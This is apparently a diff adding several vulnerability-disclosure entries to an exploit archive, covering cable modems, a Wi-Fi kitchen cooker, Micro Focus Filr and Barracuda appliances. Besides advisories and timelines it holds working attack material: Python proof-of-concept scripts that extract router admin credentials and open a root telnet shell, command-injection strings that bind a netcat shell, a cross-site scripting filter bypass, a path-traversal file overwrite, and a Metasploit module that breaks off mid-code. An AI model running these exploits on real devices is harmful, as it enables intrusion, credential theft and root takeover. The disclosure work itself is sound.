http://www.technicolor.com/en/solutions-services/connected-home/broadband-devices/cable-modems-gateways/tc7200-tc7300 + +Vulnerabilities +--------------- +Insecure session management + +The web interface does not use cookies at all and does not check the IP +address of the client. If admin login is successful, every user from the +LAN can access the management interface. + +Backup file encryption uses fix password + +Technicolor fixed the CVE-2014-1677 by encrypting the backup file with +AES. However, the encrypted backup file remains accessible without +authentication and if the password is not set in the web interface a +default password is used. So, if an attacker accesses the backup file +without authentication, the password cannot be set, and the backup file +can be decrypted. + +Timeline +-------- + +- 2015.07.30: We sent some new issues affecting the Ubee router and other findings in Technicolor TC7200 and Cisco EPC3925 devices to UPC +- Between 2015.07.31 and 08.12 there were several e-mail and phone communications between technical persons from Liberty Global to clarify the findings +- 2015.08.19: UPC sent out advisory emails to its end users to change the default WiFi passphrase +- 2016.01.27: UPC Magyarorszag send out a repeated warning to its end users about the importance of the change of the default passphrases. +- 2016.02.16: Face to face meeting with Liberty Global security personnel in Amsterdam headquarters +- 2016.02.18: A proposal was sent to Liberty Global suggesting a wardriving experiment in Budapest, Hungary to measure the rate of end users who are still using the default passphrases. + +POC +--- +POC script is available to demonstrate the following problems [2]: +- Unauthenticated backup file access +- Backup file decryption + +Recommendations +--------------- +Since only the ISP can update the firmware, we can recommend for users +to change the WiFi passphrase. + +Credits +------- +This vulnerability was discovered and researched by Gergely Eberhardt +from SEARCH-LAB Ltd. (www.search-lab.hu) + +References +---------- +[1] http://www.search-lab.hu/advisories/secadv-20160720 +[2] https://github.com/ebux/Cable-modems/tree/master/Technicolor +''' +# +# POC code for Technicolor TC7200 +# +# Demonstrates the following vulnerabilities +# - Unauthenticated backup file access +# - Backup file decryption +# +# Credit: Gergely Eberhardt (@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu) +# +# Advisory: http://www.search-lab.hu/advisories/secadv-20150720 + +import sys +import requests +import struct +import binascii +from Crypto.Cipher import AES + +class technicolor: + def __init__(self, addr, port): + self.addr = addr + self.port = port + self.s = requests.Session() + + def getUri(self, uri): + return 'http://%s:%d/%s'%(self.addr,self.port,uri) + + def downloadBackupFile(self): + r = self.s.get(self.getUri('goform/system/GatewaySettings.bin')) + resp = '' + for chunk in r: + resp += chunk + return resp + + def parseBackup(self, backup): + p = backup.find('MLog') + if (p > 0): + p += 6 + nh = struct.unpack('!H',backup[p:p+2])[0] + name = backup[p+2:p+2+nh] + p += 2+nh + ph = struct.unpack('!H',backup[p:p+2])[0] + pwd = backup[p+2:p+2+nh] + return (name,pwd) + return ('','') + + def decryptBackup(self, backup): + key = binascii.unhexlify('000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F') + l = (len(backup)/16)*16 + cipher = AES.new(key, AES.MODE_ECB, '\x00'*(16)) + plain = cipher.decrypt(backup[0:l]) + return plain + + +#------------------------------------ + +if (len(sys.argv) < 2): + print 'technicolor_tc7200_poc.py addr [port]' +addr = sys.argv[1] +port = 80 +if (len(sys.argv) == 3): + port = int(sys.argv[2]) + +# create technicolor object +t = technicolor(addr, port) + +backup = t.downloadBackupFile() +if (len(backup) > 0): + open('test.enc', 'wb').write(backup) + plain = t.decryptBackup(backup) + open('test.dec', 'wb').write(plain) + + (name, pwd) = t.parseBackup(plain) + if (name != ''): + print 'admin name: %s, pwd: %s'%(name,pwd) diff --git a/platforms/hardware/webapps/40158.txt b/platforms/hardware/webapps/40158.txt new file mode 100755 index 000000000..9becf86d3 --- /dev/null +++ b/platforms/hardware/webapps/40158.txt @@ -0,0 +1,63 @@ +Hitron CGNV4 modem/router multiple vulnerabilities +-------------------------------------------------- + +Platforms / Firmware confirmed affected: +- Hitron CGNV4, 4.3.9.9-SIP-UPC +- Product page: http://www.hitrontech.com/en/cable_detail.php?id=62 + +Vulnerabilities +--------------- +Insecure session management + +The web interface uses insecure cookies, which can be brute-forced +easily (e.g cookie: userid=0). If admin login is successful, the IP +address of the admin user is stored and everybody can access the +management interface with the same IP. + +Missing CSRF protection + +The web interface is not used any CSRF protection. In case of a valid +session exists, the attacker can modify any settings of the router. If +the default admin password was not changed, the attacker can perform a +login also and modify any settings after it. + +Authenticated command injection + +The ping diagnostic function is vulnerable to system command injection, +because the parameters are checked only at the client side. Using the +following ping target, the attacker can gain local root access to the +device: + +“google.com;nc -l -p 1337 -e /bin/sh;echo”. + +Disclaimer +---------- +We found these vulnerabilities within a very short time range (3 hours), +and we did not check a lot of areas such as: +- Command injections in other modules +- Buffer overflows +- User authentication +- Default SSID and passphrase +- Analysis of the backup file +- Device configuration (such as SNMP) + +Timeline +-------- +- 2015.10.16: Vulnerabilities found in the Hitron CGNV4 were reported to UPC Magyarorszag and Liberty Global +- 2016.01.27: UPC Magyarorszag send out a repeated warning to its end users about the importance of the change of the default passphrases. +- 2016.02.16: Face to face meeting with Liberty Global security personnel in Amsterdam headquarters +- 2016.02.18: A proposal was sent to Liberty Global suggesting a wardriving experiment in Budapest, Hungary to measure the rate of end users who are still using the default passphrases. + +Recommendations +--------------- +We do not know about any possible solution. Firmware update should +install the ISP after the fix will be ready. + +Credits +------- +This vulnerability was discovered and researched by Gergely Eberhardt +from SEARCH-LAB Ltd. (www.search-lab.hu) + +References +---------- +[1] http://www.search-lab.hu/advisories/secadv-20160720 \ No newline at end of file diff --git a/platforms/hardware/webapps/40159.txt b/platforms/hardware/webapps/40159.txt new file mode 100755 index 000000000..737da1ad5 --- /dev/null +++ b/platforms/hardware/webapps/40159.txt @@ -0,0 +1,75 @@ +Compal CH7465LG-LC modem/router multiple vulnerabilities +-------------------------------------------------------- + +The following vulnerabilities are the result of a quick check (~3 hours) +of the Mercury modem. We performed a systematic and deeper evaluation of +this device also, which result will be described in a separate report [2] and advisory. + +Platforms / Firmware confirmed affected: +- Compal CH7465LG-LC, CH7465LG-NCIP-4.50.18.13-NOSH + +Vulnerabilities +--------------- +Insecure session management + +The web interface uses cookies, but is not verified. Thus, if admin +login is successful, the IP address and the browser type of the admin +user are stored and everybody can access the management interface with +the same IP and the same user-agent. + +Information leakage + +Some information requests can be performed without authentication. For +example an attacker can obtain the following information pieces: +- Global settings (SW version, vendor name, etc.) +- CSRF token +- Event log +- LAN user table +- Ping response + +Unauthenticated deny of service attack + +Factory reset can be initiated without authentication with a simple POST +request to the getter.xml. + +Unauthenticated configuration changes +Some settings modification can be performed without authentication, for +example the first install flag and the ping command. + +Unauthenticated command injection + +The ping diagnostic function is vulnerable to system command injection, +because parameters are checked only at the client side. Using the +following ping target, the attacker can gain local root access to the +device: + +“token=&fun=126&Type=0&Target_IP=127.0.0.1&Ping_Size=64;nc +-l -p 1337 -e /bin/sh;&Num_Ping=3&Ping_Interval=1” + +Timeline +-------- +- 2015.10.21: SEARCH-LAB received two sample boxes from the Compal Mercury devices from UPC Magyarorszag +- 2015.10.21: Within three hours we reported a remotely exploitable vulnerability on the device +- 2015.10.21: Liberty Global asked for a commercial proposal on executing an overall security evaluation of the Compal device. +- 2015.10.24: A proposal was sent to Liberty Global. +- 2015.11.09: Liberty Global asked to execute the evaluation as a pilot project without financial compensation. +- 2015.12.07: End Use Certificate for Dual-Use Items was asked from Liberty Global as the developer of the device is located in China. +- 2016.01.07: The 99-page-long Evaluation Report on Compal Mercury modem was sent to Liberty Global with the restriction that they are not allowed to forward it outside of the European Union until a signed End Use Certificate is received. +- 2016.01.07: First reaction to the report said: “Bloody hell, that is not a small document ;)” +- 2016.01.11: Liberty Global sent the signed End Use Certificate for Dual-Use Items to SEARCH-LAB +- 2016.01.27: UPC Magyarorszag send out a repeated warning to its end users about the importance of the change of the default passphrases. +- 2016.02.16: Face to face meeting with Liberty Global security personnel in Amsterdam headquarters +- 2016.02.18: A proposal was sent to Liberty Global suggesting a wardriving experiment in Budapest, Hungary to measure the rate of end users who are still using the default passphrases. + +Recommendations +--------------- +We do not know about any possible solution. Firmware update should install the ISP after the fix will be ready. + +Credits +------- +This vulnerability was discovered and researched by Gergely Eberhardt from SEARCH-LAB Ltd. (www.search-lab.hu) + +References +---------- +[1] http://www.search-lab.hu/advisories/secadv-20160720 +[2] http://www.search-lab.hu/media/Compal_CH7465LG_Evaluation_Report_1.1.pdf \ No newline at end of file diff --git a/platforms/hardware/webapps/40160.py b/platforms/hardware/webapps/40160.py new file mode 100755 index 000000000..a8c398b4a --- /dev/null +++ b/platforms/hardware/webapps/40160.py @@ -0,0 +1,268 @@ +''' +Bellini/Supercook Wi-Fi Yumi SC200 - Multiple vulnerabilities + +Reported By: +================================== +James McLean - + Primary: james dot mclean at gmail dot com + Secondary: labs at juicedigital dot net + +Device Overview: +================================== +From http://www.supercook.me/en/supercook/articles/btmkm800x/ + +"The Bellini.SUPERCOOK Kitchen Master is much more than a multifunctional +kitchen machine. It has 13 functions so not only saves a huge amount of +time, it also incorporates the Yumi control module and its own recipe +collection, making it incredibly easy to use." + +Vulnerability Overview: +================================== + Vuln1) Weak Username/Password for 'root' account. + Vuln2) Information disclosure, unauthenticated. + Vuln3) Remote arbitrary code execution. + +CVE ID's +================================== +None assigned as yet. + +Disclosure Timeline +================================== +2016-06-01: Vulnerability assessment commenced. +2016-07-04: Contacted Supercook.me support via Web Contact. No response. +2016-07-12: Contacted Supercook.me support via Web Contact. No response. +2016-07-12: Contacted Supercook Australia via Facebook. Supercook responded, saying they will view the support request. No further response recieved. +2016-07-19: Contacted Supercook Australia via Facebook. No response. +2016-07-21: Posted security assessment to vortex.id.au. +2016-07-22: Mitre contacted, CVE ID's requested. + +It is with regret, but ultimately due to my concern for the community +that own these devices, that due to lack of communication I am disclosing +these vulnerabilities without the involvment of the vendor. I sincerely hope +that the vendor can resolve these issues in a timely manner. + +I intend no malice by releasing these vulnerabilities, and only wish to +inform the community so appropriate steps may be taken by the owners of +these devices. + +Due to the nature of the firmware on the device, these issues are not likely +caused by the vendor themselves. + +Please do not use the information presented here for evil. + +Affected Platforms: +================================== +Bellini/Supercook Wi-Fi Yumi SC200 - Confirmed affected: Vuln1, Vuln2, Vuln3. +Bellini/Supercook Wi-Fi Yumi SC250 - Likely affected, Vuln1, Vuln2, Vuln3, as +same firmware is used. + +As the Wi-fi Yumi firmware appears to be based on a stock firmware image +used on a number of other commodity 'IoT' devices, the vulnerabilities +described here are very likely to affect other devices with similar or +the same firmware. + +-- + +Vuln1 Details: +================================== +Weak Username/Password for Root-level account. +Username: super +Password: super + +These credentials provide access to the built in FTP server and web +administration interface. We did not attempt any more than a cursory +connection to the FTP server with these details. + +According to the details disclosed in Vuln2, an additional account is present +on the device with the following credentials: +Username: admin +Password: AlpheusDigital1010 + +With the exception of a cursory check of the built in FTP service (which +failed for these credentials), we did not attempt to access the device with +these credentials. + +Vuln1 Notes: +================================== +We did not attempt to change or ascertain if it was possible to change these +access credentials; as Vuln2 completely negates any change made. + +Vuln1 Mitigation: +================================== +Isolate the Supercook Wi-fi Yumi from any other Wireless network. +Revert to the non-wifi Yumi controller. + +-- + +Vuln2 Details: +================================== +Information disclosure, unauthenticated. + +Device URL: http://10.10.1.1/Setting.chipsipcmd + +The device offers, via its built in webserver, a full list of all configuration +parameters available. This list includes the above mentioned root account +username and password, and the password to the parent connected wifi network. +All details are in plain text, and transmitted in the format of a key-value +pair making retrieval, recovery and use of all configuration +information trivial. + +This interface is also available from the parent wi-fi network via DHCP assigned +IPv4 address. + +Vuln2 Notes: +================================== +Example data returned: +DEF_IP_ADDR=10.10.1.1 +DEF_SUBNET_MASK=255.255.255.0 +... +DEF_SUPER_NAME="super" +DEF_SUPER_PASSWORD="super" +DEF_USER_NAME="admin" +DEF_USER_PASSWORD="AlpheusDigital1010" +... + +Vuln2 Mitigation: +================================== +Isolate the Supercook Wi-fi Yumi from any other Wireless network, only using +the mobile application to upload recipes, then disconnect from the device and +connect your mobile device to a trusted network once again to access the +internet once again. + +Revert to the non-wifi Yumi controller. + +The vendor should establish a method of authentication to the device from the +various mobile applications available, and transport any configuration in an +encrypted format using keys which are not generally available or easily +discoverable. + +-- + +Vuln3 Details: +================================== +Remote arbitrary code execution. + +Device URL: http://10.10.1.1/syscmd.asp + +The device offers a built-in web-shell which, once authenticated using the +details discovered in Vuln2, allows the execution of any command the device +can execute - as the built in webserver runs as the root user. + +It is possible to execute a command using this interface that would create +any file in any location. This would allow an attacker to establish persistence. + +Additionally, the built in busybox binary includes the option +'telnetd', meaning it is +possible to execute the relevant command to start a telnet daemon remotely. +The running daemon then requires no authentication to connect, and runs as +the root account. + +Vuln3 Mitigation: +================================== +Isolate the Supercook Wi-fi Yumi from any other Wireless network. + +Revert to the non-wifi Yumi controller. + +Remove or prevent access to /syscmd.asp and /goform/formSysCmd scripts (Please +mind your warranty if you modify the files on the device). + +The vendor should disable any and all commands on the device and scripts in +the web interface which are not specifically required for the normal +functionality of the device or its communication with control apps. + +In this instance, the vendor should REMOVE the page '/syscmd.asp' and also +/goform/formSysCmd which processes commands submitted via syscmd.asp to prevent +arbitrary commands from being executed. + +Additionally, busybox should be recompiled such that the 'telnetd' option is +no longer available to be executed. + +-- + +Vuln1/Vuln2/Vuln3 Risks: +================================== +Weak and easily discoverable root credentials combined with easily accessed +remote shell functionality is a dangerous combination. These vulnerabilities +could allow any sufficiently advanced malware to become persistent in a LAN +and re-infect hosts at will (advanced crypto-locker style malware comes to +mind), capture and exfiltrate data on either Wireless network the device is +connected to, MITM any traffic routed through the device, or other as yet +unknown attack vectors. + +Additionally, as full root access is easily obtainable, it may be possible +for an attacker to cause the cooking functionality to behave erratically or +possibly even dangerously due to the built in spinning blades and heating +elements. While we ultimately did not attempt to control these aspects of the +device due to the fact that it makes our dinner most nights, these risks are +worth raising. + +This vulnerability assessment should not be considered an exhaustive list +of all vunlnerabilities the device may have. Due to time constraints we were +unable to invest the required time to discover and document all issues. Due to +the nature of the firmware on the device, most of these have likely been +discovered in other products at various times, this item may even duplicate +another from a similar device. + +Notes: +================================== +No security assessment of code used for control of cooker functionality was +undertaken; as this does not, in my opinion, rate as seriously as the other +vulnerabilities discovered and disclosed here. However, it should be noted, +that with the root access that is VERY easily obtained, it may be possible for +an attacker to cause the cooking functionality of the machine to behave +erratically or even dangerously due to the built in spinning blades and heating +elements. Further to this, a malicious partner or offspring may intentionally +sabotage dinner, if he/she would prefer to eat takeout. + +No attempt was made to connect to or manipulate files on the built in Samba +shares, however given the weak credentials sufficiently advanced malware may be +able to use these shares to establish persistence. + +The 'Bellini' name may be regional, our device was procured in Australia and +as such may or may not have a different name in other countries. + +A full, detailed, rundown and commentary is available at +https://www.vortex.id.au/2016/07/bellini-supercook-yumi-wi-fi-the-insecurity-perspective/ + +Vuln3 Proof of Concept: +================================== +''' + +#!/usr/bin/env python + +import urllib +import urllib2 +from subprocess import call + +# Connect to the device's wifi network, then run. +# Root access will be provided. + +url = 'http://10.10.1.1/goform/formSysCmd' +cmd = 'busybox telnetd -l /bin/sh' +username = 'super' +password = 'super' + +# setup the password handler +basicauth = urllib2.HTTPPasswordMgrWithDefaultRealm() +basicauth.add_password(None, url, username, password) + +authhandler = urllib2.HTTPBasicAuthHandler(basicauth) +opener = urllib2.build_opener(authhandler) + +urllib2.install_opener(opener) + +# Connect to the device, send the data +values = { + 'sysCmd': cmd, + 'apply': 'Apply', + 'submit-url': '/syscmd.asp' +} +data = urllib.urlencode(values) +pagehandle = urllib2.urlopen(url, data) + +# Connect to Telnet. +call(["telnet","10.10.1.1"]) + +# Pwnd. + +# End of document. \ No newline at end of file diff --git a/platforms/java/webapps/40161.txt b/platforms/java/webapps/40161.txt new file mode 100755 index 000000000..df7b1ff98 --- /dev/null +++ b/platforms/java/webapps/40161.txt @@ -0,0 +1,263 @@ +SEC Consult Vulnerability Lab Security Advisory < 20160725-0 > +======================================================================= + title: Multiple vulnerabilities + product: Micro Focus (former Novell) Filr Appliance + vulnerable version: Filr 2 <=2.0.0.421, Filr 1.2 <= 1.2.0.846 + fixed version: Filr 2 v2.0.0.465, Filr 1.2 v1.2.0.871 + CVE number: CVE-2016-1607, CVE-2016-1608, CVE-2016-1609 + CVE-2016-1610, CVE-2016-1611 + impact: critical + homepage: https://www.novell.com/products/filr/ + found: 2016-05-23 + by: W. Ettlinger (Office Vienna) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Bangkok - Berlin - Linz - Montreal - Moscow + Singapore - Vienna (HQ) - Vilnius - Zurich + + https://www.sec-consult.com +======================================================================= + +Vendor description: +------------------- +"Unlike other mobile file access and collaborative file sharing solutions, Micro +Focus Filr has been designed with the enterprise in mind, resulting in less +administration, better security and more productive users." + +URL: https://www.novell.com/products/filr/ + + +Business recommendation: +------------------------ +During a very quick security check several vulnerabilities with high impact +have been discovered. SEC Consult recommends to immediately apply the patches +provided by Micro Focus to address these issues. + +Please note that since SEC Consult did not conduct a thorough technical security +check SEC Consult cannot make a statement regarding the overall security of the +Micro Focus Filr appliance. + + +Vulnerability overview/description: +----------------------------------- +During a quick security check several vulnerabilities have been identified that +ultimately allow an attacker to completely compromise the appliance: + +1) Cross Site Request Forgery (CSRF) - CVE-2016-1607 +Several functions within the appliance's administative interface lack protection +against CSRF attacks. This allows an attacker who targets an authenticated +administrator to reconfigure the appliance. + +2) OS Command Injection - CVE-2016-1608 +The appliance administrative interface allows an authenticated attacker to +execute arbitrary operating system commands. Please note that an attacker can +combine this vulnerability with vulnerability #1. In this scenario, an attacker +does not need to be authenticated. + +3) Insecure System Design +The appliance uses a Jetty application server to provide the appliance +administration interface. This application server is started as the superuser +"root". Please note that combined with vulnerability #1 and #2 an attacker can +run commands as the superuser "root" without the need for any authentication. +For vendor remark on #3 see solution section. + +4) Persistent Cross-Site Scripting - CVE-2016-1609 +The Filr web interface uses a blacklist filter to try to strip any JavaScript +code from user input. However, this filter can be bypassed to persistently +inject JavaScript code into the Filr web interface. + +5) Missing Cookie Flags +The httpOnly cookie flag is not set for any session cookies set by both the +administrative appliance web interface and the Filr web interface. Please note +that combined with vulnerability #4 an attacker can steal session cookies of +both the appliance administration interface and the Filr web interface (since +cookies are shared across ports). +For vendor remark on #5 see solution section. + +6) Authentication Bypass - CVE-2016-1610 +An unauthenticated attacker is able to upload email templates. + +7) Path Traversal - CVE-2016-1610 +The functionality that allows an administrator to upload email templates fails +to restrict the directory the templates are uploaded to. Please note that +combined with vulnerability #6 an attacker is able to upload arbitray files with +the permissions of the system user "wwwrun". + +8) Insecure File Permissions - CVE-2016-1611 +A file that is run upon system user login is world-writeable. This allows a local +attacker with restricted privileges to inject commands that are being executed +as privileged users as soon as they log into the system. Please note that +combined with vulnerabilities #6 and #7 an unauthenticated attacker can inject +commands that are executed as privileged system users (e.g. root) using the Filr +web interface. + + +Proof of concept: +----------------- +1, 2, 3) +The following HTML fragment demonstrates that using a CSRF attack (#1) system +commands can be injected (#2) that are executed as the user root (#3): + +----- snip ----- + + +
+ + + + + + +
+ + +----- snip ----- + +4) +The following string demonstrates how the XSS filter can be circumvented: + + +This string can e.g. be used by a restricted user in the "phone" field of the +user profile. The script is executed by anyone viewing the profile (e.g. admins). + +5) +None of the session cookies are set with the httpOnly flag. + +6, 7, 8) +The following Java fragment demonstrates how an unauthenticated attacker (#6) +can overwrite a file in the filesystem (#7 & #8) that is executed upon user login +of e.g. the root user: + +----- snip ----- +String sessionCookie = "sectest"; +String host = "http:///"; + +ProxySettings settings = new ProxySettings(); +HttpCookie cookie = new HttpCookie("JSESSIONID", sessionCookie); + +settings.setCookieManager(new CookieManager()); +settings.getCookieManager().getCookieStore().add(new URI(host), cookie); + +settings.setModuleBaseUrl(host + "ssf/gwt/"); +settings.setRemoteServiceRelativePath("gwtTeaming.rpc"); +settings.setPolicyName("338D4038939D10E7FC021BD64B318D99"); +GwtRpcService svc = SyncProxy.createProxy(GwtRpcService.class, settings); + +VibeXsrfToken token = new VibeXsrfToken( + StringUtils.toHexString(Md5Utils.getMd5Digest(sessionCookie.getBytes()))); +((HasRpcToken) svc).setRpcToken(token); + +String fileName = "../../../../etc/profile.d/vainit.sh"; +FileBlob fileBlob = new FileBlob(ReadType.TEXT, fileName, "", 1l, 4, 1l, false, 4l); +fileBlob.setBlobDataString("id > /tmp/profiledtest\n"); +BinderInfo folderInfo = new BinderInfo(); +folderInfo.setBinderId((long) 1); +folderInfo.setBinderType(BinderType.WORKSPACE); +folderInfo.setWorkspaceType(WorkspaceType.EMAIL_TEMPLATES); +VibeRpcCmd cmd = new UploadFileBlobCmd(folderInfo, fileBlob, true); +HttpRequestInfo ri = new HttpRequestInfo(); +svc.executeCommand(ri, cmd); +----- snip ----- + + +Vulnerable / tested versions: +----------------------------- +The version 2.0.0.421 of Micro Focus Filr was found to be vulnerable. This version +was the latest version at the time of the discovery. + +According to the vendor, Filr 1.2 is also vulnerable. + + + +Vendor contact timeline: +------------------------ +2016-05-23: Sending encrypted advisory to security@novell.com, Setting latest + possible release date to 2016-07-12 +2016-05-24: Initial response from Micro Focus: forwarded the information to Filr + engineering team +2016-06-13: Micro Focus releases patch to address issue #8 +2016-06-14: Requested status update +2016-06-14: Micro Focus expects release of the patches in early July +2016-06-30: Asking for status update, answer of Micro Focus +2016-07-06: Micro Focus needs more time to patch issues, release re-scheduled for 15th +2016-07-12: Asking for status update; "final rounds of QA" at Micro Focus +2016-07-16: Postponing advisory release, patch not yet ready +2016-07-22: Patch release by Micro Focus +2016-07-25: Coordinated advisory release + + +Solution: +--------- +The "Filr 2.0 Security Update 2" can be downloaded here and should +be applied immediately: +https://download.novell.com/Download?buildid=3V-3ArYN85I~ +Those patches fix vulnerabilities #1, #2, #4, #6, #7 + +"Filr 1.2 Security Update 3" can be found here: +https://download.novell.com/Download?buildid=BOTiHcBFfv0~ + + +Knowledge base references at Micro Focus: +Issue #1: https://www.novell.com/support/kb/doc.php?id=7017786 +Issue #2: https://www.novell.com/support/kb/doc.php?id=7017789 +Issue #4: https://www.novell.com/support/kb/doc.php?id=7017787 +Issue #6 & #7: https://www.novell.com/support/kb/doc.php?id=7017788 + +Local privilege escalation via insecure file permissions (#8) has +already been fixed in the Filr 2.0 security update 1 in June: +https://www.novell.com/support/kb/doc.php?id=7017689 + + +Issue #3: According to Micro Focus, Jetty actually runs as user +"vabase-jetty" but will pass commands off to another service on +the box that runs as root to perform privileged actions. +They have fixed the command injection in this release and the +next release will include much more stringent parameter validation +for passing the commands. + +Issue #5: According to Micro Focus, a component of Filr does not +function properly when the httpOnly flag is enabled. This will be +addressed in a future release. + + +Workaround: +----------- +None + + +Advisory URL: +------------- +https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Bangkok - Berlin - Linz - Montreal - Moscow +Singapore - Vienna (HQ) - Vilnius - Zurich + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? +Send us your application https://www.sec-consult.com/en/Career.htm + +Interested in improving your cyber security with the experts of SEC Consult? +Contact our local offices https://www.sec-consult.com/en/About/Contact.htm +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF W. Ettlinger / @2016 \ No newline at end of file diff --git a/platforms/linux/remote/40146.rb b/platforms/linux/remote/40146.rb new file mode 100755 index 000000000..8d9af695d --- /dev/null +++ b/platforms/linux/remote/40146.rb @@ -0,0 +1,238 @@ +# Exploit Title: Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit +# Date: 07/21/16 +# Exploit Author: xort xort@blacksecurity.org +# Vendor Homepage: https://www.barracuda.com/ +# Software Link: https://www.barracuda.com/products/loadbalance & https://www.barracuda.com/products/webapplicationfirewall +# Version: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.007 (2016-01-07) +# Tested on: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.007 (2016-01-07) +# CVE : None. + + +# vuln: ondefine_modify_admin_role trigger exploit + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Exploit::Remote::Tcp + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in + the Barracuda Web App Firewall Firmware Version <= 8.0.1.007 and Load Balancer Firmware <= v5.4.0.004 + by exploiting a vulnerability in the web administration interface. By sending a specially crafted request + it's possible to inject system commands while escalating to root do to relaxed sudo configurations on the applianaces. + }, + 'Author' => + [ + 'xort', # vuln + metasploit module + ], + 'Version' => '$Revision: 2 $', + 'References' => + [ + [ 'none', 'none'], + ], + 'Platform' => [ 'linux'], + 'Privileged' => true, + 'Arch' => [ ARCH_X86 ], + 'SessionTypes' => [ 'shell' ], + 'Privileged' => false, + + 'Payload' => + { + 'Compat' => + { + 'ConnectionType' => 'find', + } + }, + + 'Targets' => + [ + ['Barracuda Web App Firewall Firmware Version <= 8.0.1.007 (2016-01-07)', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux', + 'SudoCmdExec' => "/home/product/code/firmware/current/bin/config_agent_wrapper.pl" + } + ], + + ['Barracuda Load Balancer Firmware <= v5.4.0.004 (2015-11-26)', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux', + 'SudoCmdExec' => "/home/product/code/firmware/current/bin/rdpd" + } + ], + ], + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('PASSWORD', [ false, 'Device password', "" ]), + OptString.new('ET', [ false, 'Device password', "" ]), + OptString.new('USERNAME', [ true, 'Device password', "admin" ]), + OptString.new('CMD', [ false, 'Command to execute', "" ]), + Opt::RPORT(8000), + ], self.class) + end + + def do_login(username, password_clear, et) + vprint_status( "Logging into machine with credentials...\n" ) + + # vars + timeout = 1550; + enc_key = Rex::Text.rand_text_hex(32) + + # send request + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/cgi-mod/index.cgi", + 'headers' => + { + 'Accept' => "application/json, text/javascript, */*; q=0.01", + 'Content-Type' => "application/x-www-form-urlencoded", + 'X-Requested-With' => "XMLHttpRequest" + }, + 'vars_post' => + { + + 'enc_key' => enc_key, + 'et' => et, + 'user' => "admin", # username, + 'password' => "admin", # password_clear, + 'enctype' => "none", + 'password_entry' => "", + 'login_page' => "1", + 'login_state' => "out", + 'real_user' => "", + 'locale' => "en_US", + 'form' => "f", + 'Submit' => "Sign in", + } + }, timeout) + + # get rid of first yank + password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result + et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0] + + return password, et + end + + def run_command(username, password, et, cmd) + vprint_status( "Running Command...\n" ) + + sudo_cmd_exec = target.SudoCmdExec + + sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}" + sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c " + + # random filename to dump too + 'tmp' HAS to be here. + dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4)) + + encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2') + + injection_string = "printf \"#{encoded_cmd}\" > #{dumpfile} ; /bin/chmod +x #{dumpfile} ; #{sudo_run_cmd_1} ; #{sudo_run_cmd_2} #{dumpfile} ; rm #{dumpfile}" + + exploitreq = [ + [ "auth_type","Local" ], + [ "et",et ], + [ "locale","en_US" ], + [ "password", password ], + [ "primary_tab", "BASIC" ], + [ "realm","" ], + [ "secondary_tab","reports" ], + [ "user", username ], + [ "timestamp", Time.now.to_i ], + + [ "scope", "" ], + [ "scope_data", "; #{injection_string} ;" ], # vuln + [ "modify_admin_role", "" ] + + ] + + + boundary = "---------------------------" + Rex::Text.rand_text_numeric(34) + + post_data = "" + + exploitreq.each do |xreq| + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n" + post_data << "#{xreq[1]}\r\n" + end + post_data << "--#{boundary}--\r\n" + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "/cgi-mod/index.cgi", + 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'data' => post_data, + 'headers' => + { + 'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0", + 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + 'Accept-Language' => "en-US,en;q=0.5" + } + }) + + end + + def run_script(username, password, et, cmds) + vprint_status( "running script...\n") + + + end + + def exploit + # timeout + timeout = 1550; + + user = "admin" + + # params + real_user = ""; + login_state = "out" + et = Time.now.to_i + locale = "en_US" + user = "admin" + password = "admin" + enctype = "MD5" + password_entry = "" + password_clear = "admin" + + + password_hash, et = do_login(user, password_clear, et) + vprint_status("new password: #{password_hash} et: #{et}\n") + + sleep(5) + + + # if no 'CMD' string - add code for root shell + if not datastore['CMD'].nil? and not datastore['CMD'].empty? + + cmd = 